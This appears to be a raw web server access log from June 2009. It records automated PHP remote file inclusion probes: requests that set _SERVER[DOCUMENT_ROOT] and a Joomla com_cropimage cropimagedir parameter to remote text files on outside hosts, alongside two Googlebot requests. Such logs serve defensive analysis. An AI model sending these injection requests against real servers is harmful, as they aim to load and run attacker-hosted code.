211.203.180.144 - - [20/Jun/2009:05:52:13 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
211.203.180.144 - - [20/Jun/2009:05:52:13 -0400] "GET /logs/access_log.Q109053100//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.203.180.144 - - [20/Jun/2009:05:52:13 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 200 6247 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:52:13 -0400] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:52:13 -0400] "GET /logs/access_log.Q109052100/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:52:13 -0400] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
94.23.200.54 - - [20/Jun/2009:05:52:17 -0400] "GET /logs/access_log.Q109053000/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.active-trend.com///video/media/fx29id1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
66.249.71.14 - - [20/Jun/2009:05:52:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001AAF4B96D2C8007AEF011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [20/Jun/2009:05:52:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L006B814A96527500CEEF072+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
